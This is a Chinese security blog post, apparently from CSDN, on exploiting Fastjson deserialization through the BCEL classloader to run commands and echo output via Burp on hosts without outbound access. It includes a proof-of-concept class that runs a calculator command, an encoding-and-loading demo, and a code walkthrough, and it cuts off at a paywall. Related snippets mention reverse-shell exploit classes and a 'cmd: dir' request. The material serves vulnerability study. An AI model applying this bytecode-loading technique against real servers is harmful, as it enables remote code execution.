利用BCEL打fastjson直接burp回显getshell

最新推荐文章于 2025-04-08 08:00:00 发布
原创 最新推荐文章于 2025-04-08 08:00:00 发布 · 2.8k 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #java

本文聚焦Java漏洞利用,以Fastjson为例,因公网漏洞减少、内网无法用dnslog探测回显,故学习用bcel链在bp中回显getshell。介绍了bcel调试分析过程,包括恶意类测试、代码调试;还讲解了公网利用jndi工具和不出网利用bcel回显shell的方法及原理。

写作背景

实战中打点的话,java漏洞是最爽的,一打就是root权限。以fastjson为例,之前我曾经写过漏洞的原理,但是公网遇到的漏洞越来越少,大多都是在内网的环境,内网里没办法使用dnslog去探测回显。这里学习一下用bcel链直接在bp中产生回显进而getshell。

bcel调试分析

这里借用Zh1z3ven师傅的代码

准备一个恶意类

import java.io.IOException;

public class calc {
    static{
        try {
            Runtime.getRuntime().exec("open -a Calculator");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

测试Demo

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;

public class BCELDemo {
    public static void main(String[] args) throws Exception {
        //使用BCEL(Byte Code Engineering Library)的Repository类的lookupClass方法,尝试从类路径中查找名为 'calc.class' 的类,并返回一个 JavaClass 对象。
        //'JavaClass' 是 BCEL 提供的类,用于表示已加载的 Java 类。
        JavaClass cls = Repository.lookupClass(calc.class);
        //使用 BCEL 提供的 'Utility' 类的 'encode' 方法,将字节码使用base64进行编码:'cls.getBytes()' 返回表示 'calc.class' 字节码的字节数组;true表示编码过程中进行分割
        String code = Utility.encode(cls.getBytes(),true);
        System.out.println(code);
        //创建了一个ClassLoader对象,调用其loadClass方法
        //loadClass方法用于加载类,接收一个字符串参数表示要加载的类的名称(这里的类通过将'$$BCEL$$'字符串和变量'code'拼接得到),再通过调用.newInstance方法创建一个新的对象
        new ClassLoader().loadClass("$$BCEL$$" + code).newInstance();
    }
}

测试结果

可以看到我们控制台上不仅出现了一段看不懂的加密字符,还弹出了计算器,说明我们的恶意代码被执行了。

代码分析调试

  • 我们在弹出计算器的这段代码打上断点,f7步入ClassLoader,创建完毕一个ClassLoader对象

  • 继续步入loadClass方法,这里上将给定的ClassLoader类作为参数传递给loadClass方法,返回调用loadClass的重载方法进行类加载,默认将第二个参数var2设置为false。

  • f7步入laodClass的实现方法,这里主要是实现类加载机制,通过一系列尝试来加载指定的类,并返回对应的Class对象。
protected Class loadClass(String class_name, boolean resolve)
    throws ClassNotFoundException
  {
    Class cl = null;

    /* First try: lookup hash table.
     */
  	//第一次尝试,在哈希表查找类
    if((cl=(Class)classes.get(class_name)) == null) {
      /* Second try: Load system class using system class loader. You better
       * don't mess around with them.
       */
    	//第二次尝试:使用系统类加载器加载系统类
      for(int i=0; i < ignored_packages.length; i++) {
        if(class_name.startsWith(ignored_packages[i])) {
          cl = deferTo.loadClass(class_name);
          break;
        }
      }

      if(cl == null) {
        JavaClass clazz = null;

        /* Third try: Special request?
         */
      	//第三次尝试:特殊请求?
        if(class_name.indexOf("$$BCEL$$") >= 0)
          clazz = createClass(class_name);
        else { // Fourth try: Load classes via repository 第四次尝试:通过仓库加载类
          if ((clazz = repository.loadClass(class_name)) != null) {
            clazz = modifyClass(clazz);
          }
          else
            throw new ClassNotFoundException(class_name);
        }

        if(clazz != null) {
          byte[] bytes  = clazz.getBytes();
          cl = defineClass(class_name, by
最低0.47元/天 解锁文章
fastjson不出网打法—BCEL
2301_76227305的博客
11-25 3702
BCEL的全名应该是Apache Commons BCEL,它是一个库。这个库里面有类叫com.sun.org.apache.bcel.internal.util,而这个类里面有一个classLoader类,ClassLoader类里面有一个loadClass方法,如果满足class_name.indexOf("$$BCEL$$") >= 0,那么就会调用createClass这个方法。我们跟踪进createClass方法看看,可以看到这里会对进来的数据进行解码,所以我们传payload时要进行编码。
Fastjson反序列化漏洞(靶场搭建复现)
hovcfuti的博客
10-10 1814
首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。
fastjson-c3p0:fastjson不出网利用
03-19
fastjson-c3p0 fastjson不出网利用 POST /json HTTP/1.1 Host: 127.0.0.1:8999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate cmd: dir Acce
BCEL类代码解析工具
06-26
BCEL代码解析工具 ,执行java -jar BCELCode.jar -d file.txt 即可解密。
Fastjson反序列化复现
2301_77315080的博客
10-10 425
将Exploit.class文件和Exploit.java文件同时放在自己的vps上,并且在当前目录下使用如下命令开启一个轻量级的http服务。使用javac Exploit.java编译java文件生成Exploit.class。将如下代码保存为Exploit.java,代码中对应的vps地址换成自己的。生成一个dnslog并查看Dnslog,表示有漏洞。使用bp抓包,重发器更改抓包,GET改为POST包。发送json到目标服务器(<=1.2.24)Fastjson插件检测有漏洞。
Fastjson 1.2.24 反序列化(CVE-2017-18349)漏洞复现
HEAVEN569的博客
06-21 1975
Fastjson 1.2.24 反序列化(CVE-2017-18349)漏洞复现
反序列化漏洞 Waf 绕过技术:解析与执行的认知博弈
最新发布
syg6921008的博客
04-08 1714
在当前的安全攻防实践中,针对反序列化漏洞的 WAF 检测机制仍存在诸多盲区与不完善之处。为了更深入地理解其绕过方式,我查阅了大量公开研究、实战案例与工具源码,并系统性地梳理出了9 类典型的反序列化漏洞 WAF 绕过技术策略。“在不被识别为恶意的前提下,如何让 payload 既具备混淆性,又能精准执行?WAF 绕过从来不只是编码和隐藏,更是一种关于解析、执行路径与安全策略认知的博弈。希望本文的内容,能为你的实战思路带来一些启发。💡。
祥云杯2021web writeup
hezhing
08-27 3963
太菜了,一个web都没做出来。接下来是复现。好好学习一下大佬们的姿势,也记录一下。 参考师傅们的wp,网上有的,侵权删。
Fastjson漏洞的识别与DNSlog
tpaer的博客
09-02 5693
Fastjson RCE漏洞实战POC探测方式
Fastjson利用笔记
2401_86436710的博客
09-05 1202
bcel 字节码原理是如果 classname 中包含$$BCEL$$这个 ClassLoader 则会将$$BCEL$$
FastjsonScan.jar 用于burp插件,扫描Fastjson漏洞
07-05
burp插件
BurpFastJsonScan:一款基于BurpSuite的被动式FastJson检测插件
03-19
BurpFastJsonScan 一款基于BurpSuite的被动式FastJson检测插件 自言自语 据听说它的诞生是因为作者在实际项目由于不够细 没有每个json都尝试进行一次fastjson的突破检测 导致差点错过了三个目标预算,好在同事够细!!! :) 作者事后后悔不已 于是乎〜 它就诞生了 简介 BurpFastJsonScan一个希望能节省一些渗透时间好进行划水的扫描插件 该插件插件BurpSuite传进来的每个不同的域名+端口的json流量进行一次fastjson dnsLog出网检测 目前的功能如下 dnsLog出网检测(由于使用的是恶意payload所以能出来基本上该站就死了) 编译方法 这是一个java maven项目 :: /BurpFastJsonScan/pom.xml 安装完对应的包以后 编译文件地址:BurpFastJsonScan / out / artif
FastjsonScan:一个简单的Fastjson反序列化检测burp插件
04-13
FastjsonScan 一个简单的Fastjson反序列化检测burp插件 我在挖洞的时候看到一些json请求总是想要检测一下有没有Fastjson反序列化问题,本可以直接写一个脚本来跑或者搭配其他被动扫描器来验证,但是我太懒了,先不说burp搭配其他扫描器了,就连找到特定目录下的脚本我都觉得麻烦,所以,我决定一劳永逸地解决这个问题,于是去学习了一下burp插件的写法糊弄出了这个插件 安装方法 下载项目中的FastjsonScan.jar文件 在burp的Extender->Extensions栏,点击Add,选择下载好的jar文件就可以了(执行环境是Java) 如果成功安装,会输出如下信息,如果未能成功安装可以换下jdk版本??我用的1.8 使用方法 使用方法也很简单,就像使用repeater一样,你可以在burp的任何地方选中一个请求右键选择【Send to FastjsonScan
fastjson反序列化漏洞复现
san3144393495的博客
04-20 895
通俗理解就是:漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大影响。FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。
【网路安全---漏洞复现】Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell(CVE-2017-18349)
m0_67844671的博客
09-27 2358
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。看了很多别人关于漏洞复现过程,很多博客过程简洁,有的过程过于复杂,比如看到写java代码,用javac进行编译等等。所以我想写出比较详细的漏洞复现过程。
[Java安全]—fastjson漏洞利用
Sentiment的博客
07-03 5753
这两天要出去就不再学新东西了,正好两点睡不着了,起来学学fastjson弥补一些接下来的内容。Fastjson 组件是阿里巴巴开发的反序列化与序列化组件Fastjson组件在反序列化不可信数据时会导致远程代码执行。究其原因:依赖 POJO POJO 是 Plain OrdinaryJava Object 的缩写,但是它通指没有使用 Entity Beans 的普通 java 对象,可以把 POJO 作为支持业务逻辑的协助类Demo 结果: test1可以看到调用时会自动调用对应的其次是若加上,则返的内容除
Fastjson反序列化漏洞原理及漏洞复现
weixin_46263525的博客
04-04 2093
Fastjson反序列化漏洞原理及反弹shell利用
Fastjson反序列化漏洞复现(实战案例)
qq_50854662的博客
08-23 1947
Fastjson反序列化漏洞复现(实战案例)
fastjson BCEL不出网打法
遇事不决冲冲冲
04-30 7560
BasicDataSource 如果目标服务器没有外网、无法反连,自然就用不了JdbcRowSetImpl利用链这种JNDI注入的利用方式,而TemplatesImpl利用链虽然原理上也是利用了 ClassLoader 动态加载恶意代码,但是需要开启Feature.SupportNonPublicField,并且实际应用中其实不多见,这里就引出BasicDataSource,我们可以直接在Payload中直接传入字节码并且不需要出网,不需要开启特殊的参数,适用范围较广,目标需要引入tomcat依赖,虽说也是
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值